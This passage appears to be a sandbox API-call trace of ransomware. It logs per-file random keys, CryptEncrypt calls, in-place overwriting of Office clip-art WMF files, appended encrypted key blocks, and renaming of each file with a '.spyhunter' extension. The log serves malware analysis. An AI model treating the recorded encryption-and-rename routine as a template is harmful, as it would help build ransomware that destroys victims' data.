pszDest=0x38c7a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF.spyhunter") returned 77 [0097.896] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf.spyhunter")) returned 1 [0097.907] GetProcessHeap () returned 0x2c0000 [0097.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x38c7a8 | out: hHeap=0x2c0000) returned 1 [0097.908] GetProcessHeap () returned 0x2c0000 [0097.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0097.908] GetProcessHeap () returned 0x2c0000 [0097.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c2f7b8 | out: hHeap=0x2c0000) returned 1 [0097.908] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f968 | out: pbBuffer=0x270f968) returned 1 [0097.909] GetProcessHeap () returned 0x2c0000 [0097.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0097.909] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f960*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f960*=0x30) returned 1 [0097.909] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00343_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0098.075] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 67 [0098.075] StrStrW (lpFirst="IN00343_.WMF", lpSrch=".txt") returned 0x0 [0098.075] GetProcessHeap () returned 0x2c0000 [0098.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x38c790 [0098.075] ReadFile (in: hFile=0x170, lpBuffer=0x38c790, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f924, lpOverlapped=0x0 | out: lpBuffer=0x38c790*, lpNumberOfBytesRead=0x270f924*=0x764, lpOverlapped=0x0) returned 1 [0098.111] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffff89c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.112] WriteFile (in: hFile=0x170, lpBuffer=0x38c790*, nNumberOfBytesToWrite=0x764, lpNumberOfBytesWritten=0x270f924, lpOverlapped=0x0 | out: lpBuffer=0x38c790*, lpNumberOfBytesWritten=0x270f924*=0x764, lpOverlapped=0x0) returned 1 [0098.112] GetProcessHeap () returned 0x2c0000 [0098.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x38c790 | out: hHeap=0x2c0000) returned 1 [0098.112] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.112] WriteFile (in: hFile=0x170, lpBuffer=0x270f964*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f924, lpOverlapped=0x0 | out: lpBuffer=0x270f964*, lpNumberOfBytesWritten=0x270f924*=0x4, lpOverlapped=0x0) returned 1 [0098.112] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f924, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f924*=0x30, lpOverlapped=0x0) returned 1 [0098.112] CloseHandle (hObject=0x170) returned 1 [0098.124] GetProcessHeap () returned 0x2c0000 [0098.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x390fd8 [0098.129] wnsprintfW (in: pszDest=0x390fd8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF.spyhunter") returned 77 [0098.129] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00343_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00343_.wmf.spyhunter")) returned 1 [0098.129] GetProcessHeap () returned 0x2c0000 [0098.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x390fd8 | out: hHeap=0x2c0000) returned 1 [0098.129] GetProcessHeap () returned 0x2c0000 [0098.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0098.129] GetProcessHeap () returned 0x2c0000 [0098.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x389238 | out: hHeap=0x2c0000) returned 1 [0098.132] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f960 | out: pbBuffer=0x270f960) returned 1 [0098.132] GetProcessHeap () returned 0x2c0000 [0098.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0098.132] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f958*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f958*=0x30) returned 1 [0098.132] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099180.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0098.256] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF") returned 67 [0098.256] StrStrW (lpFirst="J0099180.WMF", lpSrch=".txt") returned 0x0 [0098.256] GetProcessHeap () returned 0x2c0000 [0098.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c20168 [0098.256] ReadFile (in: hFile=0x178, lpBuffer=0x2c20168, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f91c, lpOverlapped=0x0 | out: lpBuffer=0x2c20168*, lpNumberOfBytesRead=0x270f91c*=0xd42, lpOverlapped=0x0) returned 1 [0098.267] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff2be, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.267] WriteFile (in: hFile=0x178, lpBuffer=0x2c20168*, nNumberOfBytesToWrite=0xd42, lpNumberOfBytesWritten=0x270f91c, lpOverlapped=0x0 | out: lpBuffer=0x2c20168*, lpNumberOfBytesWritten=0x270f91c*=0xd42, lpOverlapped=0x0) returned 1 [0098.267] GetProcessHeap () returned 0x2c0000 [0098.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20168 | out: hHeap=0x2c0000) returned 1 [0098.268] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.268] WriteFile (in: hFile=0x178, lpBuffer=0x270f95c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f91c, lpOverlapped=0x0 | out: lpBuffer=0x270f95c*, lpNumberOfBytesWritten=0x270f91c*=0x4, lpOverlapped=0x0) returned 1 [0098.268] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f91c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f91c*=0x30, lpOverlapped=0x0) returned 1 [0098.268] CloseHandle (hObject=0x178) returned 1 [0098.268] GetProcessHeap () returned 0x2c0000 [0098.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3a1020 [0098.269] wnsprintfW (in: pszDest=0x3a1020, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF.spyhunter") returned 77 [0098.269] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099180.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099180.wmf.spyhunter")) returned 1 [0098.269] GetProcessHeap () returned 0x2c0000 [0098.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a1020 | out: hHeap=0x2c0000) returned 1 [0098.270] GetProcessHeap () returned 0x2c0000 [0098.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0098.270] GetProcessHeap () returned 0x2c0000 [0098.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x38c5b8 | out: hHeap=0x2c0000) returned 1 [0098.270] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f960 | out: pbBuffer=0x270f960) returned 1 [0098.270] GetProcessHeap () returned 0x2c0000 [0098.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0098.270] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f958*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f958*=0x30) returned 1 [0098.270] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107446.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0098.271] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF") returned 67 [0098.271] StrStrW (lpFirst="J0107446.WMF", lpSrch=".txt") returned 0x0 [0098.271] GetProcessHeap () returned 0x2c0000 [0098.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c20168 [0098.272] ReadFile (in: hFile=0x178, lpBuffer=0x2c20168, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f91c, lpOverlapped=0x0 | out: lpBuffer=0x2c20168*, lpNumberOfBytesRead=0x270f91c*=0x2800, lpOverlapped=0x0) returned 1 [0098.281] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.281] WriteFile (in: hFile=0x178, lpBuffer=0x2c20168*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f91c, lpOverlapped=0x0 | out: lpBuffer=0x2c20168*, lpNumberOfBytesWritten=0x270f91c*=0x2800, lpOverlapped=0x0) returned 1 [0098.281] GetProcessHeap () returned 0x2c0000 [0098.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20168 | out: hHeap=0x2c0000) returned 1 [0098.281] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.281] WriteFile (in: hFile=0x178, lpBuffer=0x270f95c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f91c, lpOverlapped=0x0 | out: lpBuffer=0x270f95c*, lpNumberOfBytesWritten=0x270f91c*=0x4, lpOverlapped=0x0) returned 1 [0098.292] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f91c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f91c*=0x30, lpOverlapped=0x0) returned 1 [0098.292] CloseHandle (hObject=0x178) returned 1 [0098.292] GetProcessHeap () returned 0x2c0000 [0098.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3a1020 [0098.292] wnsprintfW (in: pszDest=0x3a1020, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF.spyhunter") returned 77 [0098.292] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107446.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107446.wmf.spyhunter")) returned 1 [0098.293] GetProcessHeap () returned 0x2c0000 [0098.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a1020 | out: hHeap=0x2c0000) returned 1 [0098.293] GetProcessHeap () returned 0x2c0000 [0098.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0098.293] GetProcessHeap () returned 0x2c0000 [0098.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c1f500 | out: hHeap=0x2c0000) returned 1 [0098.293] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f958 | out: pbBuffer=0x270f958) returned 1 [0098.293] GetProcessHeap () returned 0x2c0000 [0098.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0098.293] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f950*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f950*=0x30) returned 1 [0098.293] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107490.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0098.298] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF") returned 67 [0098.298] StrStrW (lpFirst="J0107490.WMF", lpSrch=".txt") returned 0x0 [0098.298] GetProcessHeap () returned 0x2c0000 [0098.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c251f8 [0098.298] ReadFile (in: hFile=0x178, lpBuffer=0x2c251f8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f914, lpOverlapped=0x0 | out: lpBuffer=0x2c251f8*, lpNumberOfBytesRead=0x270f914*=0x2800, lpOverlapped=0x0) returned 1 [0098.343] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.343] WriteFile (in: hFile=0x178, lpBuffer=0x2c251f8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f914, lpOverlapped=0x0 | out: lpBuffer=0x2c251f8*, lpNumberOfBytesWritten=0x270f914*=0x2800, lpOverlapped=0x0) returned 1 [0098.343] GetProcessHeap () returned 0x2c0000 [0098.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c251f8 | out: hHeap=0x2c0000) returned 1 [0098.343] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.344] WriteFile (in: hFile=0x178, lpBuffer=0x270f954*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f914, lpOverlapped=0x0 | out: lpBuffer=0x270f954*, lpNumberOfBytesWritten=0x270f914*=0x4, lpOverlapped=0x0) returned 1 [0098.438] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f914, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f914*=0x30, lpOverlapped=0x0) returned 1 [0098.438] CloseHandle (hObject=0x178) returned 1 [0098.438] GetProcessHeap () returned 0x2c0000 [0098.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x390fd8 [0098.438] wnsprintfW (in: pszDest=0x390fd8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF.spyhunter") returned 77 [0098.439] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107490.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107490.wmf.spyhunter")) returned 1 [0098.491] GetProcessHeap () returned 0x2c0000 [0098.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x390fd8 | out: hHeap=0x2c0000) returned 1 [0098.491] GetProcessHeap () returned 0x2c0000 [0098.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0098.494] GetProcessHeap () returned 0x2c0000 [0098.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c1fb80 | out: hHeap=0x2c0000) returned 1 [0098.496] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f958 | out: pbBuffer=0x270f958) returned 1 [0098.496] GetProcessHeap () returned 0x2c0000 [0098.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0098.496] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f950*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f950*=0x30) returned 1 [0098.496] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183574.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0098.496] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF") returned 67 [0098.496] StrStrW (lpFirst="J0183574.WMF", lpSrch=".txt") returned 0x0 [0098.496] GetProcessHeap () returned 0x2c0000 [0098.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0098.496] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f914, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f914*=0x2800, lpOverlapped=0x0) returned 1 [0098.542] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.542] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f914, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f914*=0x2800, lpOverlapped=0x0) returned 1 [0098.542] GetProcessHeap () returned 0x2c0000 [0098.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0098.542] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.542] WriteFile (in: hFile=0x178, lpBuffer=0x270f954*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f914, lpOverlapped=0x0 | out: lpBuffer=0x270f954*, lpNumberOfBytesWritten=0x270f914*=0x4, lpOverlapped=0x0) returned 1 [0098.584] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f914, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f914*=0x30, lpOverlapped=0x0) returned 1 [0098.584] CloseHandle (hObject=0x178) returned 1 [0098.584] GetProcessHeap () returned 0x2c0000 [0098.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c7e1b0 [0098.585] wnsprintfW (in: pszDest=0x2c7e1b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF.spyhunter") returned 77 [0098.585] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183574.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183574.wmf.spyhunter")) returned 1 [0098.643] GetProcessHeap () returned 0x2c0000 [0098.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e1b0 | out: hHeap=0x2c0000) returned 1 [0098.643] GetProcessHeap () returned 0x2c0000 [0098.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0098.643] GetProcessHeap () returned 0x2c0000 [0098.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c2c568 | out: hHeap=0x2c0000) returned 1 [0098.644] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f950 | out: pbBuffer=0x270f950) returned 1 [0098.644] GetProcessHeap () returned 0x2c0000 [0098.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0098.644] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f948*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f948*=0x30) returned 1 [0098.644] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00610_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00610_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0098.778] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00610_.WMF") returned 67 [0098.778] StrStrW (lpFirst="SO00610_.WMF", lpSrch=".txt") returned 0x0 [0098.778] GetProcessHeap () returned 0x2c0000 [0098.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0098.778] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f90c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f90c*=0x2800, lpOverlapped=0x0) returned 1 [0098.816] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.817] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f90c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f90c*=0x2800, lpOverlapped=0x0) returned 1 [0098.817] GetProcessHeap () returned 0x2c0000 [0098.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0098.817] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.817] WriteFile (in: hFile=0x16c, lpBuffer=0x270f94c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f90c, lpOverlapped=0x0 | out: lpBuffer=0x270f94c*, lpNumberOfBytesWritten=0x270f90c*=0x4, lpOverlapped=0x0) returned 1 [0098.873] WriteFile (in: hFile=0x16c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f90c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f90c*=0x30, lpOverlapped=0x0) returned 1 [0098.873] CloseHandle (hObject=0x16c) returned 1 [0098.873] GetProcessHeap () returned 0x2c0000 [0098.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0098.874] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00610_.WMF.spyhunter") returned 77 [0098.874] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00610_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00610_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00610_.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00610_.wmf.spyhunter")) returned 1 [0098.875] GetProcessHeap () returned 0x2c0000 [0098.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0098.875] GetProcessHeap () returned 0x2c0000 [0098.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0098.875] GetProcessHeap () returned 0x2c0000 [0098.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7cd08 | out: hHeap=0x2c0000) returned 1 [0098.875] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f950 | out: pbBuffer=0x270f950) returned 1 [0098.875] GetProcessHeap () returned 0x2c0000 [0098.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0098.875] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f948*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f948*=0x30) returned 1 [0098.875] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\whirl2.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0098.900] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL2.WMF") returned 65 [0098.900] StrStrW (lpFirst="WHIRL2.WMF", 